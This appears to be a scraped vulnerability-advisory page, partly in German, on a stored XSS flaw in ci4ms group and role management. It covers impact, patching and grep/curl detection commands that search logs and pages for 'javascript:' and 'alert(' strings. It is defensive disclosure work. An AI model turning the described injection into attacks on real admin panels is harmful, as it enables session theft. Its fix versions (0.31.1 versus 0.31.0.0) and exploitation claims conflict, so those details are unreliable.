Plattform
php
Komponente
ci4-cms-erp/ci4ms
Behoben in
0.31.1
0.31.0.0
CVE-2026-34557 describes a critical Stored DOM Cross-Site Scripting (XSS) vulnerability found in ci4-cms-erp/ci4ms. This vulnerability allows attackers to inject malicious JavaScript code through unsanitized input fields within the group and role management features. The injected code is stored server-side and subsequently rendered without proper output encoding in privileged administrative views, potentially leading to arbitrary code execution. This vulnerability affects versions of ci4-cms-erp/ci4ms up to and including 0.28.6.0, with a fix available in version 0.31.0.0.
The impact of CVE-2026-34557 is significant due to its stored nature and the context in which the XSS occurs. An attacker can inject a malicious script that is persistently stored on the server. When an administrator views the affected group or role management pages, the script will execute in their browser, allowing the attacker to steal session cookies, redirect the administrator to a phishing site, or perform actions on behalf of the administrator. Given the administrative context, this could lead to complete compromise of the application and underlying system. The stored nature of the vulnerability means that a single injection can affect multiple users who view the compromised data, amplifying the potential impact. This is similar to other stored XSS vulnerabilities where attackers have leveraged them to gain persistent access and control.
CVE-2026-34557 was publicly disclosed on 2026-04-01. The vulnerability's criticality (CVSS score of 9.1) indicates a high probability of exploitation. As of this writing, there are no publicly known active campaigns targeting this specific vulnerability, but the ease of exploitation and the potential impact make it a likely target. The vulnerability is not currently listed on the CISA KEV catalog, but its severity warrants monitoring. Public proof-of-concept (POC) code is likely to emerge, increasing the risk of exploitation.
Organizations utilizing ci4-cms-erp/ci4ms in administrative roles, particularly those with limited security controls or outdated versions, are at significant risk. Shared hosting environments where multiple users share the same instance of ci4-cms-erp/ci4ms are also particularly vulnerable, as an attacker could potentially compromise the entire hosting environment through this vulnerability.
• php: Examine application logs for unusual JavaScript execution patterns or errors related to group/role management.
grep -i 'javascript:|alert(' /var/log/apache2/error.log• generic web: Monitor HTTP requests and responses for suspicious JavaScript payloads within group/role management endpoints.
curl -s 'https://your-ci4ms-site.com/admin/groups/edit/1' | grep -i 'javascript:'• generic web: Check for unusual characters or code within group/role names or descriptions.
cat /path/to/database/groups_table.sql | grep -i 'javascript:'disclosure
Exploit-Status
EPSS
0.05% (16% Perzentil)
CISA SSVC
CVSS-Vektor
The primary mitigation for CVE-2026-34557 is to upgrade ci4-cms-erp/ci4ms to version 0.31.0.0 or later, which contains the necessary fixes. If upgrading immediately is not possible, consider implementing temporary workarounds. Input validation and output encoding are crucial. Implement strict input validation on all group and role management fields, ensuring that only expected characters and formats are allowed. Employ robust output encoding (e.g., HTML entity encoding) when rendering these fields in administrative views to prevent the browser from interpreting the injected code as executable JavaScript. Consider using a Web Application Firewall (WAF) with XSS protection rules to filter out malicious payloads. Regularly review and update the application's security configuration to minimize the attack surface.
Aktualisieren Sie CI4MS auf Version 0.31.0.0 oder höher. Diese Version behebt die Cross-Site Scripting (XSS) gespeicherte Schwachstelle in der Gruppen- und Rollenverwaltung und verhindert die Ausführung von bösartigem JavaScript-Code im administrativen Kontext.
Schwachstellenanalysen und kritische Warnungen direkt in deinen Posteingang.
CVE-2026-34557 is a critical stored DOM XSS vulnerability in ci4-cms-erp/ci4ms, allowing attackers to inject malicious JavaScript into group/role management fields, potentially leading to administrative context execution.
You are affected if you are using ci4-cms-erp/ci4ms versions 0.28.6.0 or earlier. Upgrade to 0.31.0.0 to resolve the vulnerability.
The recommended fix is to upgrade to version 0.31.0.0 or later of ci4-cms-erp/ci4ms. Implement input validation and output encoding as a temporary workaround.
While no active campaigns have been publicly reported, the vulnerability's criticality and ease of exploitation suggest a high potential for exploitation. Continuous monitoring is advised.
Refer to the official ci4-cms-erp/ci4ms project repository or website for the latest advisory and security updates.
Lade deine Abhängigkeitsdatei hoch und erfahre sofort, ob dich diese und andere CVEs treffen.